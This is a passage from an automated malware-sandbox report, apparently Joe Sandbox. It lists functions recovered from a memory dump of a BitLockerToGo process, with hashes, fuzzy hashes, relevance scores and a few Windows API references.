                                                              • API String ID:
                                                              • Opcode ID: 79127fe556a9658405add75cbb008b61965c50460a1e8f74fae70ebd445fb217
                                                              • Instruction ID: 933e5a54afd33433236d51f1e958ac7d55fa9f0f2f48ebf16da3664388a203cd
                                                              • Opcode Fuzzy Hash: 79127fe556a9658405add75cbb008b61965c50460a1e8f74fae70ebd445fb217
                                                              • Instruction Fuzzy Hash: 0DE0EC3AE440048BCB04CF58E0C08B8B3F4EB0E314B142419E965F7351CA34BDA1CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D068F0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fde5f97e0ab0fd8ab4c8d39117576fc177f609512b4090b6a92a82144f4705b
                                                              • Instruction ID: 4e16c07390c266d3fd76c855bc79c5f8d1582e6d42c1c01a4243cc17fa4d6a81
                                                              • Opcode Fuzzy Hash: 7fde5f97e0ab0fd8ab4c8d39117576fc177f609512b4090b6a92a82144f4705b
                                                              • Instruction Fuzzy Hash: 89D0173AB846808BC264DE18D5A29B6B372BB8A204B08AA58C5D2D7705C234E8158A94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D068DD Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d22671c29ecb38c2daf020fda9dc691e2951c940a4d9c163092ace2511f93e50
                                                              • Instruction ID: 4cf4a9bf7bb87c5e02a8c71a5be451d3bdffb49d20e37679c9e0197a0fc21510
                                                              • Opcode Fuzzy Hash: d22671c29ecb38c2daf020fda9dc691e2951c940a4d9c163092ace2511f93e50
                                                              • Instruction Fuzzy Hash: C6C01279A442408BC7489D44D0D1774E3757746219F04282CC492D7740C360E8148544
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D121A3 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff427d52342fc83deeabae6ae22dd88f7b6748f665d9b2e96050f375aa7a095a
                                                              • Instruction ID: b573a671cae6ba2743a474262b9d754efe6235a8c14a8575f6327f8c8f630fe0
                                                              • Opcode Fuzzy Hash: ff427d52342fc83deeabae6ae22dd88f7b6748f665d9b2e96050f375aa7a095a
                                                              • Instruction Fuzzy Hash: BCC08C39E89150CBC305CF10E4C06B0B7789B0B204704B88A8D82DB383C220DC10CF6C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1515A Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6afbb55a63cd3ee9b91bad49b70267d0dade7723843a67ab3d2061145c20739b
                                                              • Instruction ID: 7725ec7068dac90ffc3e852eda66421253c40f4a95b9e736643c1080287771bb
                                                              • Opcode Fuzzy Hash: 6afbb55a63cd3ee9b91bad49b70267d0dade7723843a67ab3d2061145c20739b
                                                              • Instruction Fuzzy Hash: FCC012B4D840405FC9C59F00E852571B3699F86204F0024249656D7382C520D8219D49
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D11CC6 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: afbe48a57ed01b769d298d0e4ac6f5229f520b85563a04a59e8da78af9ba1172
                                                              • Instruction ID: 3cce3776c5fc1d3edfe22c9799ef556a89a17f463e9e505fb541c3221e500ae0
                                                              • Opcode Fuzzy Hash: afbe48a57ed01b769d298d0e4ac6f5229f520b85563a04a59e8da78af9ba1172
                                                              • Instruction Fuzzy Hash: 0BC09235EC8180D79648CF08F992671A3BCE347208B287828C503F3381C531EC208A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D133B9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0804ebee0e51b8c3b23c74d804bf2a3fe1bffd617a2b89dc054ba30ec5335200
                                                              • Instruction ID: fb61c0410cfb3d8463095d55450059a28fef35bc744a1f1da0f2b72de9800bbc
                                                              • Opcode Fuzzy Hash: 0804ebee0e51b8c3b23c74d804bf2a3fe1bffd617a2b89dc054ba30ec5335200
                                                              • Instruction Fuzzy Hash: 4DB09234E8914097820CDE04E491430B33DA317309B00382D8802E3351C762D8258A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D1ED64 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteMetricsSelectSystem
                                                              • String ID:
                                                              • API String ID: 3911056724-3916222277
                                                              • Opcode ID: a197608d4fbf7660cbfadaae08c1bdb54ba56ece16ad3805cc476b29942c2234
                                                              • Instruction ID: 1883c09d2bed33dc2d4f48f0666a446c97ebc523cb20e1c551f2abae398c1913
                                                              • Opcode Fuzzy Hash: a197608d4fbf7660cbfadaae08c1bdb54ba56ece16ad3805cc476b29942c2234
                                                              • Instruction Fuzzy Hash: FE917CB4A04B009FC350EF29D595A1ABBF4FF49310F11892DE99ACB750E731A858CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D123F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,FB6EFD5D,0000001E,00000000,00000000,?), ref: 02D12521
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02D12580
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: HH$i,C
                                                              • API String ID: 237503144-2709025082
                                                              • Opcode ID: 93f2436a229be94cbcc6f8f4f63e21ac8510dd7a0a02744058bb26b5a4b80c80
                                                              • Instruction ID: d8e09e775828225027c22c22b1ae1e6256a4557896166b2e8278abe4732cf435
                                                              • Opcode Fuzzy Hash: 93f2436a229be94cbcc6f8f4f63e21ac8510dd7a0a02744058bb26b5a4b80c80
                                                              • Instruction Fuzzy Hash: F84178B02403049FDB68CF24D8D5B527BB6FB89304F545A5CEA9A8F786C771E812CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D13920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 02D13A19
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 02D13A4C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: A)(+$Q9{;
                                                              • API String ID: 237503144-1231720092
                                                              • Opcode ID: be01926c66cd842982e8aa2f079d718e0736efcd3d9324ff701e9747f62645b0
                                                              • Instruction ID: a31f39cdbe728e8ecc0809efa4f5d05146df6efab3eb87bd2271fc1cbe337466
                                                              • Opcode Fuzzy Hash: be01926c66cd842982e8aa2f079d718e0736efcd3d9324ff701e9747f62645b0
                                                              • Instruction Fuzzy Hash: 213158716083919BD328CF15C8A4B5BBBE6FBC5748F104A2CF9965B381D77099098BD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%